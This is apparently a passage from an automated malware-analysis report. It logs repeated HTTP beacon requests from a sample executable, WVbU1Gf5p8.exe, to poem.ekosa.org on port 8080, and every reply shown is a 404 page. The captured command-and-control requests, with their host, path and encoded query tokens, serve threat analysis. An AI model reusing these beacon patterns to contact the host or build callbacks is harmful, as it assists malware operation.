      108192.168.2.449886210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:00.321032047 CET5095OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:00.581624031 CET5096INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      109192.168.2.449887210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:00.842541933 CET5097OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:01.100214005 CET5097INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      11192.168.2.449772210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:02.931457043 CET252OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:03.193223953 CET253INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      110192.168.2.449888210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:01.374209881 CET5098OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:01.637274981 CET5098INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      111192.168.2.449889210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:02.032150984 CET5099OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:02.300961018 CET5100INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      112192.168.2.449890210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:02.600404024 CET5100OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:02.869798899 CET5101INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      113192.168.2.449891210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:03.140552998 CET5102OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:03.401673079 CET5102INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      114192.168.2.449892210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:03.778249979 CET5103OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:04.039577007 CET5103INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      115192.168.2.449893210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:04.324325085 CET5104OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:04.596781015 CET5105INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      116192.168.2.449894210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:04.903841972 CET5105OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:05.165811062 CET5106INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:05 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      117192.168.2.449895210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:05.547864914 CET5106OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:05.808041096 CET5107INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:05 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 